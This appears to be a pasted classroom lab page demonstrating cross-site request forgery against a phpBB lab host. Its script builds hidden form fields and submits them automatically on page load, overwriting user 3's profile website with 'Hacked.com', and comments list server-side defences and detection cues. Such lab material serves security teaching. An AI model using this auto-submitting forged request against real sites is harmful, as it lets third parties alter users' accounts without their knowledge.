
Untitled

a guest
Feb 28th, 2020
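  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CSRF lab demonstration</title>
  </head>
  <body>
    <h1>Javascript</h1>
    <!--
      Classroom demonstration of cross-site request forgery (CSRF) against the
      lab host www.csrflabphpbb.com. When this page loads it builds a hidden form
      and submits it to that host with no user interaction.
    -->
    <script>
    /*
     * Why this matters to a defender
     * ------------------------------
     * The request below is an ordinary top-level form POST. The browser sends it
     * with whatever cookies it holds for the target host (subject to each
     * cookie's SameSite policy), so the server cannot tell it apart from a
     * request the logged-in user made, unless the application checks something
     * that a third-party page cannot supply.
     *
     * Server-side controls that stop this class of request:
     *   - an unpredictable per-session (or per-form) token in every
     *     state-changing form, rejected when missing or wrong;
     *   - session cookies set with SameSite=Lax or SameSite=Strict;
     *   - rejecting state-changing requests whose Origin / Referer header does
     *     not match the site's own origin;
     *   - asking for the current password before changing e-mail or password.
     *
     * Detection: such requests arrive with an Origin / Referer that belongs to a
     * different site (or none at all), which is visible in request logs.
     */

    /**
     * Build a form, attach it to the document and submit it.
     *
     * @param {string} url    Value assigned to the form's action.
     * @param {string} fields Markup assigned to the form's innerHTML. It is
     *                        parsed as HTML, so it must be a trusted constant;
     *                        never pass user-controlled text here.
     */
    function post(url, fields)
    {
      var p = document.createElement('form');

      p.action = url;
      p.innerHTML = fields;
      p.target = '_self';   // the response replaces this page
      p.method = 'post';

      // A form has to be attached to the document before submit() is called.
      document.body.appendChild(p);

      p.submit();
    }

    /**
     * Assemble the hidden inputs and hand them to post().
     *
     * The field names look like those of a phpBB profile form (note the
     * commented-out mode=editprofile line); that is an inference from the
     * names, not something this page states. Most fields are left
     * commented out, exactly as in the original listing.
     */
    function csrf_hack()
    {
      // Start from an empty string. The original declared `fields` without a
      // value, so the first `+=` produced the literal text "undefined" in front
      // of the markup.
      var fields = "";
      fields += "<input type='hidden' name='username' value='alice'>";
      fields += "<input type='hidden' name='email' value='alice%40seed.com'>";
      // fields += "<input type='hidden' name='cur_password' value=''>";
      // fields += "<input type='hidden' name='new_password' value=''>";
      // fields += "<input type='hidden' name='password_confirm' value=''>";
      // fields += "<input type='hidden' name='icq' value=''>";
      // fields += "<input type='hidden' name='aim' value=''>";
      // fields += "<input type='hidden' name='msn' value=''>";
      // fields += "<input type='hidden' name='yim' value=''>";
      fields += "<input type='hidden' name='website' value='Hacked.com'>";
      // fields += "<input type='hidden' name='location' value='World'>";
      // fields += "<input type='hidden' name='occupation' value=''>";
      // fields += "<input type='hidden' name='interests' value='Hacking'>";
      // fields += "<input type='hidden' name='signature' value=''>";
      // fields += "<input type='hidden' name='viewemail' value='0'>";
      // fields += "<input type='hidden' name='hideonline' value='0'>";
      // fields += "<input type='hidden' name='notifyreply' value='0'>";
      // fields += "<input type='hidden' name='notifypm' value='1'>";
      // fields += "<input type='hidden' name='popup_pm' value='1'>";
      // fields += "<input type='hidden' name='attachsig' value='1'>";
      // fields += "<input type='hidden' name='allowbbcode' value='1'>";
      // fields += "<input type='hidden' name='allowhtml' value='0'>";
      // fields += "<input type='hidden' name='allowsmilies' value='1'>";
      // fields += "<input type='hidden' name='language' value='english'>";
      // fields += "<input type='hidden' name='style' value='1'>";
      // fields += "<input type='hidden' name='timezone' value='0'>";
      // fields += "<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
      // fields += "<input type='hidden' name='mode' value='editprofile'>";
      fields += "<input type='hidden' name='agreed' value='true'>";
      fields += "<input type='hidden' name='coppa' value='0'>";
      // user_id is a plain form field here. A server should take the account
      // identity from the authenticated session, not from a submitted value.
      fields += "<input type='hidden' name='user_id' value='3'>";
      fields += "<input type='hidden' name='current_email' value='alice%40seed.com'>";
      fields += "<input type='hidden' name='Submit' value='Submit'>";
      fields += "<input type='hidden' name='reset' class='liteoption'/>";
      post('http://www.csrflabphpbb.com/', fields);
    }

    // Runs as soon as the page has loaded; no click is required.
    window.onload = function () { csrf_hack(); };
    </script>
  </body>
  </html>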